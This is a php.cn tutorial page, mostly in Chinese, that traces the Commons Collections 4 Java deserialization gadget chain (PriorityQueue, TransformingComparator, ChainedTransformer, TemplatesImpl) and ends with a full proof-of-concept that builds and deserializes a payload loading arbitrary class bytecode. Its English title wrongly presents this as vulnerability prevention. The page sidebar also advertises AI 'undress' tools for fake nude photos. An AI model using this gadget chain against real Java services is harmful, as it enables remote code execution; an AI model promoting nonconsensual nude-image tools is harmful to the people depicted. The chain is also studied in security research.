How to implement CommonsCollections4 in Java security to prevent vulnerabilities?-javaTutorial-php.cn

Table of Contents

引子

PriorityQueue

readobject()方法

heapify()调用了siftdown()方法

TransformingComparator

问题

POC

Home

Java

javaTutorial

How to implement CommonsCollections4 in Java security to prevent vulnerabilities?

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Apr 20, 2023 pm 05:16 PM

java commonscollections4

引子

CC4简单来说就是CC3前半部分和CC2后半部分拼接组成的，对于其利用的限制条件与CC2一致，一样需要在commons-collections-4.0版本使用，原因是TransformingComparator类在3.1-3.2.1版本中还没有实现Serializable接口，无法被反序列化。

PriorityQueue

PriorityQueue是一个优先队列，作用是用来排序，重点在于每次排序都要触发传入的比较器comparator的compare()方法在CC2中，此类用于调用PriorityQueue重写的readObject来作为触发入口

PriorityQueue中的readObject间接调用了compare() 而compare()最终调用了transform()

readobject()方法

private void readObject(java.io.ObjectInputStream s)
    throws java.io.IOException, ClassNotFoundException {
    // Read in size, and any hidden stuff
    s.defaultReadObject();
    // Read in (and discard) array length
    s.readInt();
    queue = new Object[size];
    // Read in all elements.
    for (int i = 0; i &lt; size; i++)
        queue[i] = s.readObject();
    // Elements are guaranteed to be in "proper order", but the
    // spec has never explained what that might be.
    heapify();
}

Copy after login

重写了该方法并在最后调用了heapify()方法，我们跟进一下：

private void heapify() {
    for (int i = (size &gt;&gt;&gt; 1) - 1; i &gt;= 0; i--)
        siftDown(i, (E) queue[i]);
}

Copy after login

这里的话需要长度等于2才能进入for循环，我们要怎样改变长度呢。

这里用到的是该类的add方法，将指定的元素插入此优先级队列。

heapify()调用了siftdown()方法

继续跟进：

private void siftDown(int k, E x) {
    if (comparator != null)
        siftDownUsingComparator(k, x);
    else
        siftDownComparable(k, x);
}

Copy after login

可以看到判断条件

 if (comparator != null)

Copy after login

调用了

siftDownUsingComparator(k, x);

Copy after login

在siftDownUsingComparator()又调用了 comparator.compare()。

TransformingComparator

可以看到该类在CC3的版本中不能反序列化，在CC4的版本中便可以了。

TransformingComparator是一个修饰器，和CC1中的ChainedTransformer类似。

TransformingComparator里面存在compare方法，当我们调用时就会调用传入transformer对象的transform方法具体实现是this.transformer在传入ChainedTransformer后，会调用ChainedTransformer#transform反射链。

问题

1.就像刚才heapify里面所说的

private void heapify() {
    for (int i = (size &gt;&gt;&gt; 1) - 1; i &gt;= 0; i--)
        siftDown(i, (E) queue[i]);
}

Copy after login

我们要进入循环要修改值，通过add方法。

priorityQueue.add(1);
priorityQueue.add(2);

Copy after login

2.initialCapacity的值要大于1

3.comparator != null

4.通过反射来修改值防止在反序列化前调用，就如之前的链一样，我们到利用时再用反射修改参数。

类似这个样子：

Class c=transformingComparator.getClass();
        Field transformField=c.getDeclaredField("transformer");
        transformField.setAccessible(true);
        transformField.set(transformingComparator,chainedTransformer);

Copy after login

我们先放置个反序列化前不会执行这条链的随便一个参数：

TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));

Copy after login

POC

package ysoserial;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.convert.TransformWriteField;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.commons.collections4.map.LazyMap;
import org.apache.xalan.xsltc.trax.TrAXFilter;
import javax.xml.crypto.dsig.Transform;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.*;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;
public class cc4 {
    public static void main(String[] args) throws Exception {
        TemplatesImpl templates=new TemplatesImpl();
        Class tc=templates.getClass();
        Field nameField=tc.getDeclaredField("_name");
        nameField.setAccessible(true);
        nameField.set(templates,"XINO");
        Field bytecodesField=tc.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);
        byte[] code = Files.readAllBytes(Paths.get("D://tmp/test.class"));
        byte[][] codes=[code];
        bytecodesField.set(templates,codes);
        Field tfactoryField=tc.getDeclaredField("_tfactory");
        tfactoryField.setAccessible(true);
        tfactoryField.set(templates,new TransformerFactoryImpl());
        InstantiateTransformer instantiateTransformer=new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
        //
        Transformer[] transformers=new Transformer[]{
            new ConstantTransformer(TrAXFilter.class),
            instantiateTransformer
        };
        ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
        TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));
        PriorityQueue priorityQueue=new PriorityQueue<>(transformingComparator);
        priorityQueue.add(1);
        priorityQueue.add(2);
        Class c=transformingComparator.getClass();
        Field transformField=c.getDeclaredField("transformer");
        transformField.setAccessible(true);
        transformField.set(transformingComparator,chainedTransformer);
        serialize(priorityQueue);
        unserialize("ser.bin");
    }
    public static void serialize(Object obj) throws Exception{
        ObjectOutputStream oss=new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oss.writeObject(obj);
    }
    public static void unserialize(Object obj) throws Exception{
        ObjectInputStream oss=new ObjectInputStream(new FileInputStream("ser.bin"));
        oss.readObject();
    }
}

Copy after login

The above is the detailed content of How to implement CommonsCollections4 in Java security to prevent vulnerabilities?. For more information, please follow other related articles on the PHP Chinese website!

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

What's New in Windows 11 KB5054979 & How to Fix Update Issues

3 weeks ago By DDD

How to fix KB5055523 fails to install in Windows 11?

2 weeks ago By DDD

InZoi: How To Apply To School And University

3 weeks ago By DDD

How to fix KB5055518 fails to install in Windows 10?

2 weeks ago By DDD

Roblox: Dead Rails – How To Summon And Defeat Nikola Tesla

4 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

Where is the login entrance for gmail email?

7801

Java Tutorial

1644

CakePHP Tutorial

1402

Laravel Tutorial

1299

PHP Tutorial

1236

Related knowledge

Java Spring Interview Questions Aug 30, 2024 pm 04:29 PM

In this article, we have kept the most asked Java Spring Interview Questions with their detailed answers. So that you can crack the interview.

Break or return from Java 8 stream forEach? Feb 07, 2025 pm 12:09 PM

Java 8 introduces the Stream API, providing a powerful and expressive way to process data collections. However, a common question when using Stream is: How to break or return from a forEach operation? Traditional loops allow for early interruption or return, but Stream's forEach method does not directly support this method. This article will explain the reasons and explore alternative methods for implementing premature termination in Stream processing systems. Further reading: Java Stream API improvements Understand Stream forEach The forEach method is a terminal operation that performs one operation on each element in the Stream. Its design intention is

PHP: A Key Language for Web Development Apr 13, 2025 am 12:08 AM

PHP is a scripting language widely used on the server side, especially suitable for web development. 1.PHP can embed HTML, process HTTP requests and responses, and supports a variety of databases. 2.PHP is used to generate dynamic web content, process form data, access databases, etc., with strong community support and open source resources. 3. PHP is an interpreted language, and the execution process includes lexical analysis, grammatical analysis, compilation and execution. 4.PHP can be combined with MySQL for advanced applications such as user registration systems. 5. When debugging PHP, you can use functions such as error_reporting() and var_dump(). 6. Optimize PHP code to use caching mechanisms, optimize database queries and use built-in functions. 7

PHP vs. Python: Understanding the Differences Apr 11, 2025 am 12:15 AM

PHP and Python each have their own advantages, and the choice should be based on project requirements. 1.PHP is suitable for web development, with simple syntax and high execution efficiency. 2. Python is suitable for data science and machine learning, with concise syntax and rich libraries.

Java Program to Find the Volume of Capsule Feb 07, 2025 am 11:37 AM

Capsules are three-dimensional geometric figures, composed of a cylinder and a hemisphere at both ends. The volume of the capsule can be calculated by adding the volume of the cylinder and the volume of the hemisphere at both ends. This tutorial will discuss how to calculate the volume of a given capsule in Java using different methods. Capsule volume formula The formula for capsule volume is as follows: Capsule volume = Cylindrical volume Volume Two hemisphere volume in, r: The radius of the hemisphere. h: The height of the cylinder (excluding the hemisphere). Example 1 enter Radius = 5 units Height = 10 units Output Volume = 1570.8 cubic units explain Calculate volume using formula: Volume = π × r2 × h (4

PHP vs. Other Languages: A Comparison Apr 13, 2025 am 12:19 AM

PHP is suitable for web development, especially in rapid development and processing dynamic content, but is not good at data science and enterprise-level applications. Compared with Python, PHP has more advantages in web development, but is not as good as Python in the field of data science; compared with Java, PHP performs worse in enterprise-level applications, but is more flexible in web development; compared with JavaScript, PHP is more concise in back-end development, but is not as good as JavaScript in front-end development.

PHP vs. Python: Core Features and Functionality Apr 13, 2025 am 12:16 AM

PHP and Python each have their own advantages and are suitable for different scenarios. 1.PHP is suitable for web development and provides built-in web servers and rich function libraries. 2. Python is suitable for data science and machine learning, with concise syntax and a powerful standard library. When choosing, it should be decided based on project requirements.

Create the Future: Java Programming for Absolute Beginners Oct 13, 2024 pm 01:32 PM

Java is a popular programming language that can be learned by both beginners and experienced developers. This tutorial starts with basic concepts and progresses through advanced topics. After installing the Java Development Kit, you can practice programming by creating a simple "Hello, World!" program. After you understand the code, use the command prompt to compile and run the program, and "Hello, World!" will be output on the console. Learning Java starts your programming journey, and as your mastery deepens, you can create more complex applications.

See all articles